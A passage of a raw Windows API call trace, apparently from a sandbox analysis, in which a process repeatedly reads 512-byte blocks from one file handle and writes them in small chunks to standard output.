nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] GetFileType (hFile=0x4c) returned 0x1 [0112.746] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.746] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.747] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.747] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] GetFileType (hFile=0x4c) returned 0x1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] GetFileType (hFile=0x4c) returned 0x1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] GetFileType (hFile=0x4c) returned 0x1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] GetFileType (hFile=0x4c) returned 0x1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] GetFileType (hFile=0x4c) returned 0x1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] GetFileType (hFile=0x4c) returned 0x1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] GetFileType (hFile=0x4c) returned 0x1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.747] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.747] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.748] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.748] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] GetFileType (hFile=0x4c) returned 0x1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.748] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.748] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.749] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.749] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] GetFileType (hFile=0x4c) returned 0x1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.749] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.749] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] GetFileType (hFile=0x4c) returned 0x1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.750] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.750] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] GetFileType (hFile=0x4c) returned 0x1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] GetFileType (hFile=0x4c) returned 0x1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] GetFileType (hFile=0x4c) returned 0x1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] GetFileType (hFile=0x4c) returned 0x1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] GetFileType (hFile=0x4c) returned 0x1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] GetFileType (hFile=0x4c) returned 0x1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.750] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.750] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.751] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.751] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] GetFileType (hFile=0x4c) returned 0x1 [0112.751] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.751] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.752] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.752] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] GetFileType (hFile=0x4c) returned 0x1 [0112.752] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.752] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.753] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.753] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesRead=0x28e3e4*=0x200, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] WriteFile (in: hFile=0x4c, lpBuffer=0x28f1f4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] WriteFile (in: hFile=0x4c, lpBuffer=0x28f244*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f244*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] WriteFile (in: hFile=0x4c, lpBuffer=0x28f294*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f294*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] WriteFile (in: hFile=0x4c, lpBuffer=0x28f2e4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f2e4*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] GetFileType (hFile=0x4c) returned 0x1 [0112.753] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.753] WriteFile (in: hFile=0x4c, lpBuffer=0x28f334*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f334*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.754] GetFileType (hFile=0x4c) returned 0x1 [0112.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.754] WriteFile (in: hFile=0x4c, lpBuffer=0x28f384*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f384*, lpNumberOfBytesWritten=0x28e3d8*=0x50, lpOverlapped=0x0) returned 1 [0112.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.754] GetFileType (hFile=0x4c) returned 0x1 [0112.754] _get_osfhandle (_FileHandle=1) returned 0x4c [0112.754] WriteFile (in: hFile=0x4c, lpBuffer=0x28f3d4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28e3d8, lpOverlapped=0x0 | out: lpBuffer=0x28f3d4*, lpNumberOfBytesWritten=0x28e3d8*=0x20, lpOverlapped=0x0) returned 1 [0112.754] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.754] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28e3c4 | out: lpNewFilePointer=0x0) returned 1 [0112.754] _get_osfhandle (_FileHandle=4) returned 0x54 [0112.754] ReadFile (in: hFile=0x54, lpBuffer=0x28f1f4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28e3e4, lpOverlapped=0x0 | out: lpBuffer=0x28f1f4*, 